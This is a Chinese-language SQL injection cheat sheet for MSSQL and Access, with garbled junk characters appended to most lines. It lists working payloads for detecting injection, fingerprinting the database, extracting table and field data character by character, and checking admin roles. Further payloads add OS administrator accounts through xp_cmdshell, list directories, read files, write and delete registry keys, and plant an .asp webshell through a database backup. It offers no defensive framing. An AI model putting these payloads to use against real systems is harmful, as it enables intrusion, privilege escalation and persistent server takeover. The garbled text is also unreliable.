1.判断是否有注入;and 1=1 ;and 1=2 �_Ep{|]:gw
2.初步判断是否是mssql ;and user>0 ^F�0k2�pB�
n}��AR�/3}
3.注入参数是字符'and [查询条件] and ''=' "W?l ���R4
��{<-
ouD
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �}<5\O*kX4
+Bt�LyQ���
5.判断数据库系统 ?�YkO�+?}+
)H[h5�3bIq
;and (select count(*) from sysobjects)>0 mssql dyQ<�UT��
N[��+o[�%A
;and (select count(*) from msysobjects)>0 access O" X!�S_�R
YO.`�l�~ v
%9�~kA�5Qj
�)��M&Azbu
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ;�3.T* ?|o
�fw(j�6:�p
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �N8DiE�B3~
S+_A�
<p��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 E5Snl#Gl\0
WQI�M2_�=M
9.(1)猜字段的ascii值(access) t�K�s4}vW�
&dZ.+#�8r�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 +h�g�a�BJy
np�'M4^E;
(2)猜字段的ascii值(mssql) ySr09�1��Q
&ge�OFe}R
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 m��&3�HFf
8M3p\}O���
10.测试权限结构(mssql) +e\:C~2f28
k"DQbU�y0L
�DMK"Q�#Vw
43�}&w�.AS
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- lk+=�2��6>
/\3X��AR�t
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Ol/2%UJ�XL
T,x��VQ4J?
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- cOZajC<G��
�;�8%@�Lan
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- e�BYaq!t
k
?Qo_
KQ%sn
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �;���K)?�:
�GH�;� F3s
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- =�B o4��yN
g`~lIt�[=
;and 1=(select IS_MEMBER('db_owner'));-- qN`]*�ba�S
�H~�_^�w.P
1CS]�~1Yp:
^Lg�{�2hjj
11.添加mssql和系统的帐户 _!CvtUU0Vv
w=P�<4�bdT
;exec master.dbo.sp_addlogin username;-- [r��/�Seg"
;exec master.dbo.sp_password null,username,password;-- y?R ��<g^A
�!g8.8(/t)
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- PE;0
jgsiI
v0�jz)z<#�
;exec master.dbo.xp_cmdshell 'net user username password z5o�9\.y({
_>?8eC�]4a
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �M�;RnH##W
�d,�D�g"�Z
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 2Z I�pzH/8
\ \mO+N47i
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �+D�V�6�oh
K���z*AzB
��tpx�3:|�
[%)B%h`XGf
12.(1)遍历目录 c�&I,e�ds
{</$ObK��
;create table dirs(paths varchar(100), id int) K�7&8�;So
q�@RY.&mgW
;insert dirs exec master.dbo.xp_dirtree 'c:\' >G3��J3P(�
Ci#5@Q9�#w
;and (select top 1 paths from dirs)>0 3x�C�A�\*�
Uf�]Pd)�D�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 23n8,�} H,
�}HQT@�&=
[E�y%uh
6*
e[�k�;�SSs
(2)遍历目录 RVKa�qJ0e<
u�%�IKM��\
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- %Pvb>U�(Xs
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 5tCq}]q#P
I\4�`90uBN
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 bu�M>��^A"
h�r}R,BR|�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 {����^19.F
nTtt�$I@hW
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �?28GQy�k4
�!
{o+B^�^
ZT-���45_
8/�kO9'�.P
13.mssql中的存储过程 ��.�S��Tf�
U�+A(.+d.�
xp_regenumvalues 注册表根键, 子键 PQ���#-.�K
H�r,lA�(��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 _.8]7f`*Gc
�� F-\8f(\
xp_regread 根键,子键,键值名 /t��6u"I~
�N*oJ$:�#
;exec xp_regread ps;o[gB@�5
m�E@o���27
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 X��qva&�/-
3\l9Sf=M|�
xp_regwrite 根键,子键, 值名, 值类型, 值 nz�?�BLO�=
J2k'Ke97o�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 E��s��xTBg
V'h�z1r�oe
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ���W����oG
aTL7�"Myp�
xp_regdeletevalue 根键,子键,值名 a|{�<#<6n(
@�:&�d�OqQ
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 `�e;�Sjf�<
/@}# K��P=
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �f2e�$B�A�
L�zSusjEW@
[g�oPmV�e+
�q'-l;�V|
14.mssql的backup创建webshell ?�-��v?SN#
;�H�wJw\fo
use model ieoUZCO^r\
�8��r���|�
create table cmd(str image); n8�D;6#P^�
^
/eSby���
insert into cmd(str) values (''); Kyiez]T6%q
�K�FG^vmrn
backup database model to disk='c:\l.asp'; 7Ki�7N{K�t
n/Z� =q?�_
tD482�S�b=
GB Un" _J
15.mssql内置函数 ^I�q.�0E9_
UsKn4�K�h�
;and (select @@version)>0 获得Windows的版本号 �j-\u_#kx%
~Of�K�n�1D
;and user_name()='dbo' 判断当前系统的连接用户是不是sa }�+Z;zm@/6
KAEpFob�Yo
;and (select user_name())>0 爆当前系统的连接用户 �9:5NX3"�p
<xz-7EqbwX
;and (select db_name())>0 得到当前连接的数据库 OtqLig�t&l
v�xZUtyJfe
45JL�x?rN_
78��0MSFV8
16.简洁的webshell Y0'^S<�ox�
}�/FM#Xh��
use model +& Qqu`)?F
@&>
+`kgU-
create table cmd(str image); K?eo)|4)DB
:Dm@3S$4<�
insert into cmd(str) values (''); �;:1�mv���
��j�* ja)
backup database model to disk='g:\wwwtest\l.asp';
